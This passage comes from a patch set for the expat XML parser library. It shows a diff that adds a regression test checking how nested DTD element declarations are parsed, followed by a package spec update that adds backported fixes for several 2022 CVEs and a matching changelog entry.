+ errorFlags |= ((model[0].children == &model[1]) ? 0 : (1u << 5));
+ errorFlags |= ((model[0].name == NULL) ? 0 : (1u << 6));
+
+ errorFlags |= ((model[1].type == XML_CTYPE_CHOICE) ? 0 : (1u << 7));
+ errorFlags |= ((model[1].quant == XML_CQUANT_NONE) ? 0 : (1u << 8));
+ errorFlags |= ((model[1].numchildren == 3) ? 0 : (1u << 9));
+ errorFlags |= ((model[1].children == &model[3]) ? 0 : (1u << 10));
+ errorFlags |= ((model[1].name == NULL) ? 0 : (1u << 11));
+
+ errorFlags |= ((model[2].type == XML_CTYPE_NAME) ? 0 : (1u << 12));
+ errorFlags |= ((model[2].quant == XML_CQUANT_REP) ? 0 : (1u << 13));
+ errorFlags |= ((model[2].numchildren == 0) ? 0 : (1u << 14));
+ errorFlags |= ((model[2].children == NULL) ? 0 : (1u << 15));
+ errorFlags |= ((xcstrcmp(model[2].name, XCS("zebra")) == 0) ? 0 : (1u << 16));
+
+ errorFlags |= ((model[3].type == XML_CTYPE_NAME) ? 0 : (1u << 17));
+ errorFlags |= ((model[3].quant == XML_CQUANT_NONE) ? 0 : (1u << 18));
+ errorFlags |= ((model[3].numchildren == 0) ? 0 : (1u << 19));
+ errorFlags |= ((model[3].children == NULL) ? 0 : (1u << 20));
+ errorFlags |= ((xcstrcmp(model[3].name, XCS("bar")) == 0) ? 0 : (1u << 21));
+
+ errorFlags |= ((model[4].type == XML_CTYPE_NAME) ? 0 : (1u << 22));
+ errorFlags |= ((model[4].quant == XML_CQUANT_NONE) ? 0 : (1u << 23));
+ errorFlags |= ((model[4].numchildren == 0) ? 0 : (1u << 24));
+ errorFlags |= ((model[4].children == NULL) ? 0 : (1u << 25));
+ errorFlags |= ((xcstrcmp(model[4].name, XCS("foo")) == 0) ? 0 : (1u << 26));
+
+ errorFlags |= ((model[5].type == XML_CTYPE_NAME) ? 0 : (1u << 27));
+ errorFlags |= ((model[5].quant == XML_CQUANT_PLUS) ? 0 : (1u << 28));
+ errorFlags |= ((model[5].numchildren == 0) ? 0 : (1u << 29));
+ errorFlags |= ((model[5].children == NULL) ? 0 : (1u << 30));
+ errorFlags |= ((xcstrcmp(model[5].name, XCS("xyz")) == 0) ? 0 : (1u << 31));
+
+ XML_SetUserData(g_parser, (void *)(uintptr_t)errorFlags);
+ XML_FreeContentModel(g_parser, model);
+}
+
+START_TEST(test_dtd_elements_nesting) {
+ // Payload inspired by a test in Perl's XML::Parser
+ const char *text = "<!DOCTYPE foo [\n"
+ "<!ELEMENT junk ((bar|foo|xyz+), zebra*)>\n"
+ "]>\n"
+ "<foo/>";
+
+ XML_SetUserData(g_parser, (void *)(uintptr_t)-1);
+
+ XML_SetElementDeclHandler(g_parser, element_decl_check_model);
+ if (XML_Parse(g_parser, text, (int)strlen(text), XML_TRUE)
+ == XML_STATUS_ERROR)
+ xml_failure(g_parser);
+
+ if ((uint32_t)(uintptr_t)XML_GetUserData(g_parser) != 0)
+ fail("Element declaration model regression detected");
+}
+END_TEST
+
/* Test foreign DTD handling */
START_TEST(test_set_foreign_dtd) {
const char *text1 = "<?xml version='1.0' encoding='us-ascii'?>\n";
@@ -11863,6 +11939,7 @@ make_suite(void) {
tcase_add_test(tc_basic, test_memory_allocation);
tcase_add_test(tc_basic, test_default_current);
tcase_add_test(tc_basic, test_dtd_elements);
+ tcase_add_test(tc_basic, test_dtd_elements_nesting);
tcase_add_test__ifdef_xml_dtd(tc_basic, test_set_foreign_dtd);
tcase_add_test__ifdef_xml_dtd(tc_basic, test_foreign_dtd_not_standalone);
tcase_add_test__ifdef_xml_dtd(tc_basic, test_invalid_foreign_dtd);
--
1.8.3.1

View File

@ -1,7 +1,7 @@
%define Rversion %(echo %{version} | sed -e 's/\\./_/g' -e 's/^/R_/')
Name: expat
Version: 2.4.1
Release: 3
Release: 4
Summary: An XML parser library
License: MIT
URL: https://libexpat.github.io/
@ -13,6 +13,15 @@ Patch2: backport-CVE-2022-22822-CVE-2022-22823-CVE-2022-22824-CVE-2022-2
Patch3: backport-CVE-2022-23852-lib-Detect-and-prevent-integer-overflow-in-XML_GetBu.patch
Patch4: backport-CVE-2022-23852-tests-Cover-integer-overflow-in-XML_GetBuffer-CVE-20.patch
Patch5: backport-CVE-2022-23990-lib-Prevent-integer-overflow-in-doProlog-CVE-2022-23.patch
Patch6: backport-CVE-2022-25235-lib-Add-missing-validation-of-encoding.patch
Patch7: backport-tests-Cover-missing-validation-of-encoding.patch
Patch8: backport-CVE-2022-25236-lib-Protect-against-malicious-namespace-declarations.patch
Patch9: backport-tests-Cover-CVE-2022-25236.patch
Patch10: backport-CVE-2022-25313-Prevent-stack-exhaustion-in-build_model.patch
Patch11: backport-CVE-2022-25314-Prevent-integer-overflow-in-copyString.patch
Patch12: backport-CVE-2022-25315-Prevent-integer-overflow-in-storeRawNames.patch
Patch13: backport-Fix-build_model-regression.patch
Patch14: backport-tests-Protect-against-nested-element-declaration-mod.patch
BuildRequires: sed,autoconf,automake,gcc-c++,libtool,xmlto
@ -66,6 +75,12 @@ make check
%{_mandir}/man1/*
%changelog
* Sat Feb 26 2022 yangzhuangzhuang <yangzhuangzhuang1@h-partners.com> - 2.4.1-4
- Type:CVE
- ID:CVE-2022-25235 CVE-2022-25236 CVE-2022-25313 CVE-2022-25314 CVE-2022-25315
- SUG:NA
- DESC:Fix CVE-2022-25235 CVE-2022-25236 CVE-2022-25313 CVE-2022-25314 CVE-2022-25315
* Mon Feb 7 2022 yangzhuangzhuang <yangzhuangzhuang1@h-partners.com> - 2.4.1-3
- Type:CVE
- ID:CVE-2022-23852 CVE-2022-23990